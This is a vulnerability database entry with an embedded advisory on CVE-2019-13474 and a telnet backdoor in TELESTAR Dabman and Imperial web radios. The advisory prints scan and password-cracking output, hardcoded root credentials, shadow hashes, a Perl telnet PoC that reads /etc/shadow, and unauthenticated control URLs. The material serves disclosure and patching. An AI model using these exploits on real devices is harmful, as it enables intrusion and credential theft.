    "description": "TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.",
    "id": "GSD-2019-13474"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2019-13474"
      ],
      "details": "TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.",
      "id": "GSD-2019-13474",
      "modified": "2023-12-13T01:23:41.704801Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2019-13474",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.vulnerability-lab.com/get_content.php?id=2183",
            "refsource": "MISC",
            "url": "https://www.vulnerability-lab.com/get_content.php?id=2183"
          },
          {
            "name": "http://seclists.org/fulldisclosure/2019/Sep/12",
            "refsource": "MISC",
            "url": "http://seclists.org/fulldisclosure/2019/Sep/12"
          },
          {
            "name": "20230904 Vulnerabilities in Internet Radio auna IR-160 SE (UIProto)",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2023/Sep/1"
          },
          {
            "name": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:bobs_rock_radio_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:bobs_rock_radio:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:dabman_d10_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:dabman_d10:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:dabman_i30_stereo_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:dabman_i30_stereo:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:imperial_i110_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:imperial_i110:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:imperial_i150_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:imperial_i150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:imperial_i200_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:imperial_i200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:imperial_i200-cd_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:imperial_i200-cd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:imperial_i400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:imperial_i400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:imperial_i450_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:imperial_i450:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:imperial_i500-bt_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:imperial_i500-bt:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:telestar:imperial_i600_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:telestar:imperial_i600:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-13474"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-798"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.vulnerability-lab.com/get_content.php?id=2183",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://www.vulnerability-lab.com/get_content.php?id=2183"
            },
            {
              "name": "http://seclists.org/fulldisclosure/2019/Sep/12",
              "refsource": "MISC",
              "tags": [
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "http://seclists.org/fulldisclosure/2019/Sep/12"
            },
            {
              "name": "20230904 Vulnerabilities in Internet Radio auna IR-160 SE (UIProto)",
              "refsource": "FULLDISC",
              "tags": [],
              "url": "http://seclists.org/fulldisclosure/2023/Sep/1"
            },
            {
              "name": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html",
              "refsource": "MISC",
              "tags": [],
              "url": "http://packetstormsecurity.com/files/174503/Internet-Radio-auna-IR-160-SE-UIProto-DoS-XSS-Missing-Authentication.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-09-05T17:15Z",
      "publishedDate": "2019-09-16T12:15Z"
    }
  }
}

VAR-201909-1008

Vulnerability from variot - Updated: 2024-11-23 22:11

TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands. plural TELESTAR The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit this vulnerability to execute arbitrary commands on the system. Document Title:

Dabman & Imperial (i&d) Web Radio Devices - Undocumented Telnet Backdoor & Command Execution Vulnerability

References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2183

Video: https://www.vulnerability-lab.com/get_content.php?id=2190

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474

CVE-ID:

CVE-2019-13473

Release Date:

2019-09-09

Vulnerability Laboratory ID (VL-ID):

2183

Common Vulnerability Scoring System:

9.4

Vulnerability Class:

Multiple

Current Estimated Price:

5.000€ - 10.000€

Product & Service Introduction:

Since 1993, TELESTAR has been synonymous with quality and a very good price/performance ratio in the consumer electronics segment. TELESTAR-DIGITAL GmbH distributes high-quality reception technology for digital TV reception via satellite (DVB-S), cable (DVBC) or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region of Germany. The product portfolio includes digital receivers and the latest generation of television sets as well as modern distribution and single-cable technology, satellite to IP reception solutions and radio transmission systems. The product range is rounded off by Germany's most comprehensive range of accessories for digital television reception.

(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )

Abstract Advisory Information:

The vulnerability laboratory research team discovered multiple vulnerabilities in the dabman and imperial web radio devices series (typ d & i).

Vulnerability Disclosure Timeline:

2018-06-01: Researcher Notification & Coordination (Security Researcher) 2018-06-02: Vendor Notification (Telestar Digital Data Security Department) 2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security Department) 2018-08-30: Vendor Fix/Patch (Service Developer Team) 2019-09-08: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Published

Exploitation Technique:

Remote

Severity Level:

Critical

Authentication Type:

Pre auth - no privileges

User Interaction:

No User Interaction

Disclosure Type:

Coordinated Disclosure

Technical Details & Description:

1.1 The dabman and imperial manufactured web radio series (typ d & i) suffers from a weak password vulnerability. The vulnerabilites allows local and remote attackers to compromise the web radios full embedded linux busybox os.

The vulnerability is located within an undocumented telnet service (telnetd) of the linux busybox and is turned permanently on. The telnetd service uses weak passwords with hardcoded credentials on the local embedded linux busybox of the internet radio devices. The telnet password can be cracked by usage of simple manual password bruteforce technics or by basic automated attacks with scripts (exp. ncrack). After receiving the password the remote or local network attacker can unauthorized login to the internet radio device to use the embedded linux busybox operating system.

After the attacker has been logged in as root user, he can open the /etc/ path to cat gshadow, shadow and the conf files. At the end the attacker has finally full root access on the busybox (telnetd), he can access the web-server (httpd) as admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. A demo exploit poc is available in the wild. The vulnerability allows local and remote attackers unauthorized and unauthenticated send commands to comprimise the web radio devices.

The vulnerability is located httpd web-server communcation on port 80 and 8080. Local and remote attackers can send basic GET commands with basic command line tools (exp. curl or modhttp) to modify or manipulate http requests. The attacker can also capture the http airmusic commands to reverse engineer the radio device for unauthorized interactions. The system has no protection mechanism to block unauthorized transmit of commands. The web radio as well not owns an auth or reminder mechanism to ensure only allowed or trusted sources can transmit the commands (client, system, mac , auth ...). For security demonstration or to reproduce follow the provided information and steps below to continue.

Nmap Portscan Scanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports] Discovered open port 8080/tcp on 93.234.141.215 Discovered open port 80/tcp on 93.234.141.215 Discovered open port 23/tcp on 93.234.141.215 Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports) Initiating Service scan at 14:48 Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215) Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host) Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018 (93.234.141.215) NSE: Script scanning 93.234.141.215. Initiating NSE at 14:48 Completed NSE at 14:49, 30.61s elapsed Initiating NSE at 14:49 Completed NSE at 14:49, 0.00s elapsed Nmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215) Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet security DVR telnetd (many brands) 80/tcp open tcpwrapped |http-title: AirMusic 8080/tcp open http BusyBox httpd 1.13 | http-methods: | Supported Methods: GET |_http-title: 404 Not Found MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.16 - 2.6.35 (embedded) Uptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=197 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NCrack [telnetd] (ncrack -v --user root [IP]:[PORT]) C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23 Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit Discovered credentials on telnet://93.234.141.215:23 'root' 'password' Discovered credentials on telnet://93.234.141.215:23 'root' 'password1' Discovered credentials on telnet://93.234.141.215:23 'root' 'password2' Discovered credentials on telnet://93.234.141.215:23 'root' 'password123' Discovered credentials on telnet://93.234.141.215:23 'root' 'password12' Discovered credentials on telnet://93.234.141.215:23 'root' 'password3' Discovered credentials on telnet://93.234.141.215:23 'root' 'password!' telnet://93.234.141.215:23 finished. Too many failed attemps. Discovered credentials for telnet on 93.234.141.215 23/tcp: 93.234.141.215 23/tcp telnet: 'root' 'password' 93.234.141.215 23/tcp telnet: 'root' 'password1' 93.234.141.215 23/tcp telnet: 'root' 'password2' 93.234.141.215 23/tcp telnet: 'root' 'password123' 93.234.141.215 23/tcp telnet: 'root' 'password12' 93.234.141.215 23/tcp telnet: 'root' 'password3' 93.234.141.215 23/tcp telnet: 'root' 'password!' Ncrack done: 1 service scanned in 273.29 seconds. Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117 Ncrack finished.

System: BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)

Kernel: 9)20151217_M8_TFT_7601_Kernel

OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh_frame.init_array. fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes

Built-in commands: . : [ [[ bg break cd chdir continue echo eval exec exit export false fg hash help jobs kill local printf pwd read readonly return set shift source test times trap true type ulimit umask unset wait

Currently defined functions: [, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput, gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat

Username: root Password: password & password!

shadow root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey) ftp:!:0:::::: (decrypted: empty/blank) usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond)

gshadow root:::root,mldonkey

PoC: Exploit use Net::Telnet (); use Cwd; $file="inputLog.txt"; $ofile="outputlog.txt";

For local network change to localhost or local ip

@hosts = ("93.234.141.215");

foreach $hostip (sort @hosts) { $t = new Net::Telnet (Timeout => 10, Input_log => $file, Prompt => "/>/"); print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n"; print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n"; $t->open("$hostip"); $t->login("root","password"); my @lines = $t->cmd('cat /etc/shadow'); print "$hostip: Directories:n"; print "@lines n"; $t->close; }

1.2 AirMusic Unauthenticated Command Execution (httpd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue.

AirMusic Status Interface: http://93.234.141.215:80 Web-Server HTTPD UIData Path: http://93.234.141.215:8080

Note: Attacks can be performed in the local network (Localhost:80) or remotly by requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23).

Get device name from Device http://93.234.141.215:80/irdevice.xml

Set device name http://93.234.141.215:80/set_dname?name=PWND

Set boot-logo (HTTP URL, requirement: JPG) http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg

Display or retrieve channel logo http://93.234.141.215:80:8080/playlogo.jpg

Changing the main menu with the selected language http://93.234.141.215:80/init?language=us

Play stream http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME

Save audio file as message http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1

Recall channel hotkeys http://93.234.141.215:80/hotkeylist

Current playback data http://93.234.141.215:80/playinfo

Set volume from 0-31 & mute function http://93.234.141.215:80/setvol?vol=10&mute=0

Reset http://93.234.141.215:80/back

Set stop http://93.234.141.215:80/stop

Activate all back http://93.234.141.215:80/exit

Send keystroke combo http://93.234.141.215:80/Sendkey?key=3

PoC: Exploit

Dabman & Imerpial - HTML AutoPwner PoC: Checker for Modifications #!/usr/bin/perl use strict; use warnings; use LWP::Simple; my $url1 = 'http://93.234.141.215:80/'; my $source1 = get( $url1 ); my $url2 = 'http://93.234.141.215:80/'; my $source2 = get( $url2 ); print $source1; print $source1; Solution - Fix & Patch: ======================= A fresh updated version is available by the manufacturer telestar to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security. 1. Set the device to the factory setting 2. Select language 3. Switch off the device 4. Switch on the device 5. Network setup 6. Wait for "New Software" message 7. Press OK to start the update 8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624 Security Risk: ============== The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet. Credits & Authors: ================== Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com . The internet radio device auna IR-160 SE has multiple vulnerabilities. It uses the firmware UIProto, different versions of which can also be found in many other radios. The firmware offers a rudimentary web API that can be reached on the local network on port 80. This API is completely unauthenticated, allowing anyone to control the radio over the local network. (already known as CVE-2019-13474, but relevant for the other two findings) [1] [2] [3] 2. The web UI does not encode user input, resulting in a XSS vulnerability, e.g. The firmware crashes when sending a device name longer than 84 characters. Some parts of the firmware will recover afterwards and music will play again after a few seconds, but the service on port 80 remains borked until the radio is reset using the switch on the back. This may or may not be a memory corruption vulnerability. I don't feel like analyzing this any further, but it certainly looks kinda fucked. These reports also mention other devices that are possibly affected by this as well. Also, if anyone knows how to re-enable telnetd on the patched version of UIProto, please let me know! Love, naphthalin [1] https://github.com/kayrus/iradio [2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio [3] https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201909-1008",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "imperial i500-bt",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "bobs rock radio",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i200-cd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i110",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i600",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "dabman d10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i450",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i200",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "dabman i30 stereo",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "bobs rock radio",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "dabman d10",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "dabman i30 stereo",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
        "model": "imperial i110",
        "scope": null,
        "trust": 0.8,
        "vendor": "telestar",
        "version": null
      },
      {
